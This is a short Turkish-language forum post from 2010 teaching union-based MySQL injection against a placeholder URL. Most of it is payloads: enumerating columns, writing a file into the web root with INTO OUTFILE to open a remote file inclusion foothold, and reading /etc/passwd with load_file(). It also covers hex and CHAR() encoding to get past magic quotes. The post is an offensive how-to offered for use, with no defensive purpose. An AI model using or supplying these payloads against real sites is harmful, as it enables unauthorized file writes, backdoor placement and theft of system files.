Yazan
ahmet
Yeni Üye
03 Temmuz 2010 Cumartesi 09:55:25
mysql injection olayında dosya oluşturmak çok basittir.hemen göstereyim.
şimdi sitemiz burası olsun
http://www.site.com/x.php?id=1
aldıgımız hatalara göre colomnları yazalım örnegin 5 colomn olsun
http://www.site.com/x.php?id=-1 union select 1,2,3,4,5
aldıgımız hatada 3 olsun
http://www.site.com/x.php?id=-1 union select 1,2,'buraya oluştracagimiz dosyanin kodu',4,5 INTO+OUFILE+'sitenin dizini/olusturacaginiz dosyanin adi'/*

örnegin kendimize rfi yolu açabiliriz
"buraya oluştracagimiz dosyanin kodu" yazan yere ''
bsait bir sayfa çagırma kodu ile kendimize rfi yolu açabiliriz.

Dosya okumak ise daha basit bir olay.load_file() fonksiyonu ile dosya okuyabilirsiniz.
şöyleki
union select 1,2,load_file(etc/passwd) komutu ile etc dizinindeki passwd dosyasını okuyabilirsiniz yada sizin istediginiz dosyayı... ama bazen magic qoutes buna karşı koyar onun içinde hexleyip başına 0x katarak olayı çözebilirsiinz.bazende hexlemek yetmez charlayip yapmaya gerek kaabilir o da şöyle oluyorki;
LOAD_FILE(CHAR(charladiginz dizin))
gibi...

Cevap yazmak için üye olmalısınız!
Hemen üye olmak için burayı tıklayınız..
 
 
Sayfalar:  1